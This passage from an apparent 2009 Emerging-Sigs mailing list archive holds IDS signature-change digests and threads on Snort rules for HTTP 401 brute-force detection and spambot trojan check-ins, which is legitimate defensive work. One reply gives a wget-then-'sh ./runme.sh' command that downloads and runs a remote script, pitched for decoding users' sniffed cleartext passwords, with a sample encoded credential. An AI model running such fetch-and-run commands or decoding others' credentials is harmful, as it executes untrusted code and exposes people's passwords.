Russian Business Network Monitored Domains - BLOCKING (88) (emerging-rbn-BLOCK.rules) 2407088 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (89) (emerging-rbn-BLOCK.rules) 2407089 - ET RBN Known Russian 
Business Network Monitored Domains - BLOCKING (90) (emerging-rbn-BLOCK.rules) 2407090 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (91) (emerging-rbn-BLOCK.rules) 2407091 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (92) (emerging-rbn-BLOCK.rules) 2407092 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (93) (emerging-rbn-BLOCK.rules) 2407093 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (94) (emerging-rbn-BLOCK.rules) 2407094 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (95) (emerging-rbn-BLOCK.rules) 2407095 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (96) (emerging-rbn-BLOCK.rules) 2407096 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (97) (emerging-rbn-BLOCK.rules) 2407097 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (98) (emerging-rbn-BLOCK.rules) 2407098 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (99) (emerging-rbn-BLOCK.rules) 2407099 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (100) (emerging-rbn-BLOCK.rules) 2407100 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (101) (emerging-rbn-BLOCK.rules) 2407101 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (102) (emerging-rbn-BLOCK.rules) 2407102 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (103) (emerging-rbn-BLOCK.rules) 2407103 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (104) (emerging-rbn-BLOCK.rules) 2407104 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (105) (emerging-rbn-BLOCK.rules) 2407105 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (106) (emerging-rbn-BLOCK.rules) 2407106 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (107) (emerging-rbn-BLOCK.rules) 2407107 - ET RBN Known Russian Business Network Monitored 
Domains - BLOCKING (108) (emerging-rbn-BLOCK.rules) 2407108 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (109) (emerging-rbn-BLOCK.rules) 2407109 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (110) (emerging-rbn-BLOCK.rules) 2407110 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (111) (emerging-rbn-BLOCK.rules) 2407111 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (112) (emerging-rbn-BLOCK.rules) 2407112 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (113) (emerging-rbn-BLOCK.rules) 2407113 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (114) (emerging-rbn-BLOCK.rules) 2407114 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (115) (emerging-rbn-BLOCK.rules) 2407115 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (116) (emerging-rbn-BLOCK.rules) 2407116 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (117) (emerging-rbn-BLOCK.rules) 2407117 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (118) (emerging-rbn-BLOCK.rules) 2407118 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (119) (emerging-rbn-BLOCK.rules) 2407119 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (120) (emerging-rbn-BLOCK.rules) 2407120 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (121) (emerging-rbn-BLOCK.rules) 2407121 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (122) (emerging-rbn-BLOCK.rules) 2407122 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (123) (emerging-rbn-BLOCK.rules) 2407123 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (124) (emerging-rbn-BLOCK.rules) 2407124 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (125) (emerging-rbn-BLOCK.rules) 2407125 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING 
(126) (emerging-rbn-BLOCK.rules) 2407126 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (127) (emerging-rbn-BLOCK.rules) 2407127 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (128) (emerging-rbn-BLOCK.rules) 2407128 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (129) (emerging-rbn-BLOCK.rules) 2407129 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (130) (emerging-rbn-BLOCK.rules) 2407130 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (131) (emerging-rbn-BLOCK.rules) 2407131 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (132) (emerging-rbn-BLOCK.rules) 2407132 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (133) (emerging-rbn-BLOCK.rules) 2407133 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (134) (emerging-rbn-BLOCK.rules) 2407134 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (135) (emerging-rbn-BLOCK.rules) 2407135 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (136) (emerging-rbn-BLOCK.rules) 2407136 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (137) (emerging-rbn-BLOCK.rules) 2407137 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (138) (emerging-rbn-BLOCK.rules) 2407138 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (139) (emerging-rbn-BLOCK.rules) 2407139 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (140) (emerging-rbn-BLOCK.rules) 2407140 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (141) (emerging-rbn-BLOCK.rules) 2407141 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (142) (emerging-rbn-BLOCK.rules) 2407142 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (143) (emerging-rbn-BLOCK.rules) 2407143 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (144) 
(emerging-rbn-BLOCK.rules) 2407144 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (145) (emerging-rbn-BLOCK.rules) 2407145 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (146) (emerging-rbn-BLOCK.rules) 2407146 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (147) (emerging-rbn-BLOCK.rules) 2407147 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (148) (emerging-rbn-BLOCK.rules) 2407148 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (149) (emerging-rbn-BLOCK.rules) 2407149 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (150) (emerging-rbn-BLOCK.rules) 2407150 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (151) (emerging-rbn-BLOCK.rules) 2407151 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (152) (emerging-rbn-BLOCK.rules) 2407152 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (153) (emerging-rbn-BLOCK.rules) 2407153 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (154) (emerging-rbn-BLOCK.rules) 2407154 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (155) (emerging-rbn-BLOCK.rules) 2407155 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (156) (emerging-rbn-BLOCK.rules) 2407156 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (157) (emerging-rbn-BLOCK.rules) 2407157 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (158) (emerging-rbn-BLOCK.rules) 2407158 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (159) (emerging-rbn-BLOCK.rules) 2407159 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (160) (emerging-rbn-BLOCK.rules) 2407160 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (161) (emerging-rbn-BLOCK.rules) 2407161 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (162) 
(emerging-rbn-BLOCK.rules) 2407162 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (163) (emerging-rbn-BLOCK.rules) 2407163 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (164) (emerging-rbn-BLOCK.rules) 2407164 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (165) (emerging-rbn-BLOCK.rules) 2407165 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (166) (emerging-rbn-BLOCK.rules) 2407166 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (167) (emerging-rbn-BLOCK.rules) 2407167 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (168) (emerging-rbn-BLOCK.rules) 2407168 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (169) (emerging-rbn-BLOCK.rules) 2407169 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (170) (emerging-rbn-BLOCK.rules) 2407170 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (171) (emerging-rbn-BLOCK.rules) 2407171 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (172) (emerging-rbn-BLOCK.rules) 2407172 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (173) (emerging-rbn-BLOCK.rules) 2407173 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (174) (emerging-rbn-BLOCK.rules) 2407174 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (175) (emerging-rbn-BLOCK.rules) 2407175 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (176) (emerging-rbn-BLOCK.rules) 2407176 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (177) (emerging-rbn-BLOCK.rules) 2407177 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (178) (emerging-rbn-BLOCK.rules) 2407178 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (179) (emerging-rbn-BLOCK.rules) 2407179 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (180) 
(emerging-rbn-BLOCK.rules) 2407180 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (181) (emerging-rbn-BLOCK.rules) 2407181 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (182) (emerging-rbn-BLOCK.rules) 2407182 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (183) (emerging-rbn-BLOCK.rules) 2407183 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (184) (emerging-rbn-BLOCK.rules) 2407184 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (185) (emerging-rbn-BLOCK.rules) 2407185 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (186) (emerging-rbn-BLOCK.rules) 2407186 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (187) (emerging-rbn-BLOCK.rules) 2407187 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (188) (emerging-rbn-BLOCK.rules) 2407188 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (189) (emerging-rbn-BLOCK.rules) 2407189 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (190) (emerging-rbn-BLOCK.rules) 2407190 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (191) (emerging-rbn-BLOCK.rules) 2407191 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (192) (emerging-rbn-BLOCK.rules) 2407192 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (193) (emerging-rbn-BLOCK.rules) 2407193 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (194) (emerging-rbn-BLOCK.rules) 2407194 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (195) (emerging-rbn-BLOCK.rules) 2407195 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (196) (emerging-rbn-BLOCK.rules) 2407196 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (197) (emerging-rbn-BLOCK.rules) 2407197 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (198) 
[+++] Added non-rule lines: [+++]

-> Added to emerging-drop-BLOCK.rules (2):
# VERSION 1534
# Generated 2009-05-09 00:03:03 EDT

-> Added to emerging-drop.rules (2):
# VERSION 1534
# Generated 2009-05-09 00:03:03 EDT

-> Added to emerging-policy.rules (1):
#by Juan Manuel Lorenzo at ossim

-> Added to emerging-rbn-BLOCK.rules (2):
# VERSION 128
# Updated 2009-05-07 11:32:09

-> Added to emerging-rbn.rules (2):
# VERSION 128
# Updated 2009-05-07 11:32:09

-> Added to emerging-sid-msg.map (82):

-> Added to emerging-sid-msg.map.txt (82):

-> Added to emerging-web.rules (1):
#by Jaime Blasco

[---] Removed non-rule lines: [---]

-> Removed from emerging-drop-BLOCK.rules (2):
# VERSION 1527
# Generated 2009-05-02 00:03:03 EDT

-> Removed from emerging-drop.rules (2):
# VERSION 1527
# Generated 2009-05-02 00:03:03 EDT

-> Removed from emerging-rbn-BLOCK.rules (2):
# VERSION 127
# Updated 2009-04-29 09:08:59

-> Removed from emerging-rbn.rules (2):
# VERSION 127
# Updated 2009-04-29 09:08:59

-> Removed from emerging-sid-msg.map (5):

-> Removed from emerging-sid-msg.map.txt (5):

From emerging at emergingthreats.net Sun May 10 16:00:10 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sun, 10 May 2009 16:00:10 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090510200010.BEF764504D@goliath.jonkmans.com>

[***] Results from Oinkmaster started Sun May 10 16:00:10 2009 [***]

[*] Rules modifications: [*]
None.
[+++] Added non-rule lines: [+++]

-> Added to emerging-sid-msg.map (2):
2500139 || ET COMPROMISED Known Compromised or Hostile Host Traffic (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510139 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

-> Added to emerging-sid-msg.map.txt (2):
2500139 || ET COMPROMISED Known Compromised or Hostile Host Traffic (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510139 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

From jaime.blasco at alienvault.com Mon May 11 06:58:15 2009
From: jaime.blasco at alienvault.com (Jaime Blasco)
Date: Mon, 11 May 2009 12:58:15 +0200
Subject: [Emerging-Sigs] ET ATTACK-RESPONSES 401 Unauthorized
Message-ID: <53834cf20905110358x4ce3a876t3f95b5db33a4bb46@mail.gmail.com>

Hi!,

I've been detecting some activity related to router's authentication bruteforce. We haven't got a rule to detect 401 error responses (Unauthorized), so what about something like this?:

alert tcp $HTTP_SERVERS $HTTP_PORTS -> $EXTERNAL_NET any (msg:"ET ATTACK-RESPONSES 401 Unauthorized"; flow:from_server,established; content:"HTTP/1.1 401"; depth:12; classtype:attempted-recon; sid:; rev:1;)

Regards

-- 
Jaime Blasco
www.ossim.com
www.alienvault.com
Email: jaime.blasco at alienvault.com

From jonkman at jonkmans.com Mon May 11 09:20:03 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Mon, 11 May 2009 09:20:03 -0400
Subject: [Emerging-Sigs] ET ATTACK-RESPONSES 401 Unauthorized
In-Reply-To: <53834cf20905110358x4ce3a876t3f95b5db33a4bb46@mail.gmail.com>
References: <53834cf20905110358x4ce3a876t3f95b5db33a4bb46@mail.gmail.com>
Message-ID: <4A082603.7030305@jonkmans.com>

That's a darn good idea. Funny the simple things that none of us have thought of yet...

Posting now. Thanks Jaime!

Matt

Jaime Blasco wrote:
> Hi!,
>
> I've been detecting some activity related to router's authentication
> bruteforce. We haven't got a rule to detect 401 error responses
> (Unauthorized) so what about something like this?:
>
> alert tcp $HTTP_SERVERS $HTTP_PORTS -> $EXTERNAL_NET any (msg:"ET
> ATTACK-RESPONSES 401 Unauthorized"; flow:from_server,established;
> content:"HTTP/1.1 401"; depth:12; classtype:attempted-recon; sid:; rev:1;)
>
> Regards

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc

From pepperjack at afferentsecurity.com Mon May 11 09:54:36 2009
From: pepperjack at afferentsecurity.com (Jack Pepper)
Date: Mon, 11 May 2009 08:54:36 -0500
Subject: [Emerging-Sigs] ET ATTACK-RESPONSES 401 Unauthorized
In-Reply-To: <53834cf20905110358x4ce3a876t3f95b5db33a4bb46@mail.gmail.com>
References: <53834cf20905110358x4ce3a876t3f95b5db33a4bb46@mail.gmail.com>
Message-ID: <20090511085436.o1dsklr42sw44k80@mail.afferentsecurity.com>

Quoting Jaime Blasco :
> Hi!,
>
> I've been detecting some activity related to router's authentication
> bruteforce. We haven't got a rule to detect 401 error responses
> (Unauthorized) so what about something like this?:
>
> alert tcp $HTTP_SERVERS $HTTP_PORTS -> $EXTERNAL_NET any (msg:"ET
> ATTACK-RESPONSES 401 Unauthorized"; flow:from_server,established;
> content:"HTTP/1.1 401"; depth:12; classtype:attempted-recon; sid:; rev:1;)

A single 401 all by itself is not significant. Perhaps add a threshold to detect the brute force attack.

Really, I think (since we are on the 401 idea) that if the sensor is detecting a 401 at all, it indicates that the web site is accepting user credentials in the clear. So maybe two rules here:
-- one for a flurry of 401s indicating a brute force attack
-- another for "web site passes user credentials in the clear"

jp

-- 
Framework? I don't need no stinking framework!
----------------------------------------------------------------
@fferent Security Labs: Isolate/Insulate/Innovate
http://www.afferentsecurity.com

From jonkman at jonkmans.com Mon May 11 10:18:33 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Mon, 11 May 2009 10:18:33 -0400
Subject: [Emerging-Sigs] ET ATTACK-RESPONSES 401 Unauthorized
In-Reply-To: <20090511085436.o1dsklr42sw44k80@mail.afferentsecurity.com>
References: <53834cf20905110358x4ce3a876t3f95b5db33a4bb46@mail.gmail.com> <20090511085436.o1dsklr42sw44k80@mail.afferentsecurity.com>
Message-ID: <4A0833B9.1040808@jonkmans.com>

Good ideas Jack. I did that when I committed. One sig for individual hits, and a threshold to indicate some brute forcing.

That ought to let folks use the one that best fits them!
Thanks

Matt

Jack Pepper wrote:
> A single 401 all by itself is not significant. Perhaps add a
> threshold to detect the brute force attack.
>
> Really, I think (since we are on the 401 idea) that if the sensor is
> detecting a 401 at all, it indicates that the web site is accepting user
> credentials in the clear. So maybe two rules here:
> -- one for a flurry of 401s indicating a brute force attack
> -- another for "web site passes user credentials in the clear"
>
> jp

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc

From jonkman at jonkmans.com Mon May 11 10:52:23 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Mon, 11 May 2009 10:52:23 -0400
Subject: [Emerging-Sigs] Spambot detection on 2008189, mod
In-Reply-To: <839aec700905081322jecb8b06sc54cacdc89ba4252@mail.gmail.com>
References: <839aec700905081322jecb8b06sc54cacdc89ba4252@mail.gmail.com>
Message-ID: <4A083BA7.5050700@jonkmans.com>

Good catch Darren. I'll post the change now.

Thanks!

Matt

Darren Spruell wrote:
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
> SpamTool.Win32.Agent.gy Or Similar HTTP Checkin";
> flow:established,to_server; uricontent:"alive.php?id="; nocase;
> uricontent:"&tick="; nocase; uricontent:"&ver="; nocase;
> uricontent:"&smtp="; nocase; classtype:trojan-activity;
> reference:url,doc.emergingthreats.net/2008189;
> reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_General_Spamtools;
> sid:2008189; rev:2;)
>
> Caught a report mentioning request as follows:
>
> hxxp://91.207.4.138/spm/page.php?id=&tick=108484&ver=100&smtp=ok&task=0
>
> ...so relying on the script name breaks this. Alteration?:
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
> SpamTool.Win32.Agent.gy Or Similar HTTP Checkin";
> flow:established,to_server; uricontent:"?id="; nocase;
> uricontent:"&tick="; nocase; uricontent:"&ver="; nocase;
> uricontent:"&smtp="; nocase; classtype:trojan-activity;
> reference:url,doc.emergingthreats.net/2008189;
> reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_General_Spamtools;
> sid:2008189; rev:3;)
>
> Above is probably still specific enough without worrying about the
> maybe recently added 'tick' parameter...

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc

From wkitty42 at windstream.net Mon May 11 13:13:00 2009
From: wkitty42 at windstream.net (waldo kitty)
Date: Mon, 11 May 2009 13:13:00 -0400
Subject: [Emerging-Sigs] ET ATTACK-RESPONSES 401 Unauthorized
In-Reply-To: <20090511085436.o1dsklr42sw44k80@mail.afferentsecurity.com>
References: <53834cf20905110358x4ce3a876t3f95b5db33a4bb46@mail.gmail.com> <20090511085436.o1dsklr42sw44k80@mail.afferentsecurity.com>
Message-ID: <4A085C9C.8010101@windstream.net>

Jack Pepper wrote:
> A single 401 all by itself is not significant. Perhaps add a
> threshold to detect the brute force attack.
>
> Really, I think (since we are on the 401 idea) that if the sensor is
> detecting a 401 at all, it indicates that the web site is accepting user
> credentials in the clear. So maybe two rules here:
> -- one for a flurry of 401s indicating a brute force attack
> -- another for "web site passes user credentials in the clear"

i do something very similar to catch and block brute force ftp login attempts... ie: more than 5 in 30 seconds surely indicates an automated tool ;)

-- 
NOTE: NEW EMAIL ADDRESS!!
Waldo Kitty, Waldo's Place USA
telnet://bbs.wpusa.dynip.com
http://www.wpusa.dynip.com
ftp://ftp.wpusa.dynip.com
wkitty42 -at- windstream.net

From david.glosser at gmail.com Mon May 11 13:23:08 2009
From: david.glosser at gmail.com (David Glosser)
Date: Mon, 11 May 2009 13:23:08 -0400
Subject: [Emerging-Sigs] ET ATTACK-RESPONSES 401 Unauthorized
In-Reply-To: <4A0833B9.1040808@jonkmans.com>
References: <53834cf20905110358x4ce3a876t3f95b5db33a4bb46@mail.gmail.com> <20090511085436.o1dsklr42sw44k80@mail.afferentsecurity.com> <4A0833B9.1040808@jonkmans.com>

Well, after 2914 hits in two hours here, I'm disabling 2009345 :)
No idea what is going on, but that's another day...

Keeping the brute force one for now.

On Mon, May 11, 2009 at 10:18 AM, Matt Jonkman wrote:
> Good ideas Jack. I did that when I committed. One sig for individual
> hits, and a threshold to indicate some brute forcing.
>
> That ought to let folks use the one that best fits them!
>
> Thanks
>
> Matt

From pepperjack at afferentsecurity.com Mon May 11 13:51:12 2009
From: pepperjack at afferentsecurity.com (Jack Pepper)
Date: Mon, 11 May 2009 12:51:12 -0500
Subject: [Emerging-Sigs] ET ATTACK-RESPONSES 401 Unauthorized
References: <53834cf20905110358x4ce3a876t3f95b5db33a4bb46@mail.gmail.com> <20090511085436.o1dsklr42sw44k80@mail.afferentsecurity.com> <4A0833B9.1040808@jonkmans.com>
Message-ID: <20090511125112.r9f8fqxds04sgoc8@mail.afferentsecurity.com>

Quoting David Glosser :
> Well, after 2914 hits in two hours here, I'm disabling 2009345 :)
> No idea what is going on, but that's another day...

What's going on is that your web site (in the destination ip) is permitting users to send their credentials in the clear.

Clear text passwords are really a policy problem in most organizations. Security is easy, policy is *really* hard.

If you want to decode their userids and passwords you can download my base64 decoder at:

wget -O b64.tgz http://www.autoshun.org/downloads/b64.tgz
tar -xzvf b64.tgz
sh ./runme.sh

then call it as "echo amltYm9iOmNoZXNzZHVkZTQyCg== | base64decode"

Sometimes when you address people by their passwords ("hey, chessdude42, howz it going?") it helps get policy moving in the right direction. [or gets you fired]

jp

> Keeping the brute force one for now.
>
> On Mon, May 11, 2009 at 10:18 AM, Matt Jonkman wrote:
>> Good ideas Jack. I did that when I committed. One sig for individual
>> hits, and a threshold to indicate some brute forcing.
>>
>> That ought to let folks use the one that best fits them!

-- 
Framework? I don't need no stinking framework!
----------------------------------------------------------------
@fferent Security Labs: Isolate/Insulate/Innovate
http://www.afferentsecurity.com
From david.glosser at gmail.com Mon May 11 14:45:30 2009
From: david.glosser at gmail.com (David Glosser)
Date: Mon, 11 May 2009 14:45:30 -0400
Subject: [Emerging-Sigs] ET ATTACK-RESPONSES 401 Unauthorized
In-Reply-To: <20090511125112.r9f8fqxds04sgoc8@mail.afferentsecurity.com>
References: <53834cf20905110358x4ce3a876t3f95b5db33a4bb46@mail.gmail.com> <20090511085436.o1dsklr42sw44k80@mail.afferentsecurity.com> <4A0833B9.1040808@jonkmans.com> <20090511125112.r9f8fqxds04sgoc8@mail.afferentsecurity.com>

On Mon, May 11, 2009 at 1:51 PM, Jack Pepper wrote:
> Quoting David Glosser :
>
>> Well, after 2914 hits in two hours here, I'm disabling 2009345 :)
>> No idea what is going on, but that's another day...
>
> What's going on is that your web site (in the destination ip) is permitting
> users to send their credentials in the clear.

It's internal intranet and QA sites, clear credentials is a battle for another day :)

> Clear text passwords are really a policy problem in most organizations.
> Security is easy, policy is *really* hard.
>
> If you want to decode their userids and passwords you can download my base64
> decoder at:
>
> wget -O b64.tgz http://www.autoshun.org/downloads/b64.tgz
> tar -xzvf b64.tgz
> sh ./runme.sh
>
> then call it as "echo amltYm9iOmNoZXNzZHVkZTQyCg== | base64decode"
>
> Sometimes when you address people by their passwords ("hey, chessdude42,
> howz it going?") it helps get policy moving in the right direction. [or
> gets you fired]

Gotta try it... Thanks!

> jp

From emerging at emergingthreats.net Mon May 11 16:00:10 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Mon, 11 May 2009 16:00:10 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090511200010.E761D4504D@goliath.jonkmans.com>

[***] Results from Oinkmaster started Mon May 11 16:00:10 2009 [***]

[+++] Added rules: [+++]
2009345 - ET ATTACK-RESPONSE HTTP 401 Unauthorized (emerging-attack_response.rules)
2009346 - ET ATTACK-RESPONSE Frequent HTTP 401 Unauthorized - Possible Brute Force Attack (emerging-attack_response.rules)

[///] Modified active rules: [///]
2008189 - ET TROJAN SpamTool.Win32.Agent.gy/Grum/Tedroo Or Similar HTTP Checkin (emerging-virus.rules)

[---] Removed rules: [---]
2002035 - ET MALWARE Better Internet Spyware User Agent Activity (thin) (emerging-malware.rules)

[+++] Added non-rule lines: [+++]

-> Added to emerging-sid-msg.map (3):
2008189 || ET TROJAN SpamTool.Win32.Agent.gy/Grum/Tedroo Or Similar HTTP Checkin || url,securitylabs.websense.com/content/Blogs/2721.aspx || url,www.secureworks.com/research/threats/botnets2009/ || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_General_Spamtools || url,doc.emergingthreats.net/2008189
2009345 || ET ATTACK-RESPONSE HTTP 401 Unauthorized
2009346 || ET ATTACK-RESPONSE Frequent HTTP 401 Unauthorized - Possible Brute Force Attack

-> Added to emerging-sid-msg.map.txt (3):
2008189 || ET TROJAN SpamTool.Win32.Agent.gy/Grum/Tedroo Or Similar HTTP Checkin || url,securitylabs.websense.com/content/Blogs/2721.aspx || url,www.secureworks.com/research/threats/botnets2009/ || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_General_Spamtools || url,doc.emergingthreats.net/2008189
2009345 || ET ATTACK-RESPONSE HTTP 401 Unauthorized
2009346 || ET ATTACK-RESPONSE Frequent HTTP 401 Unauthorized - Possible Brute Force Attack

[---] Removed non-rule lines: [---]

-> Removed from emerging-sid-msg.map (4):
2002035 || ET MALWARE Better Internet Spyware User Agent Activity (thin) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_USER_Agents || url,doc.emergingthreats.net/bin/view/Main/2002035
2008189 || ET TROJAN SpamTool.Win32.Agent.gy Or Similar HTTP Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_General_Spamtools || url,doc.emergingthreats.net/2008189
2500139 || ET COMPROMISED Known Compromised or Hostile Host Traffic (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510139 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

-> Removed from emerging-sid-msg.map.txt (4):
2002035 || ET MALWARE Better Internet Spyware User Agent Activity (thin) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_USER_Agents || url,doc.emergingthreats.net/bin/view/Main/2002035
2008189 || ET TROJAN SpamTool.Win32.Agent.gy Or Similar HTTP Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_General_Spamtools || url,doc.emergingthreats.net/2008189
2500139 || ET COMPROMISED Known Compromised or Hostile Host Traffic (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510139 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

From frank at knobbe.us Mon May 11 21:00:23 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Mon, 11 May 2009 20:00:23 -0500
Subject: [Emerging-Sigs] RealVNC sigs 2002922 + 2002920
Message-ID: <1242090023.7228.257.camel@localhost>

Gentlemen,

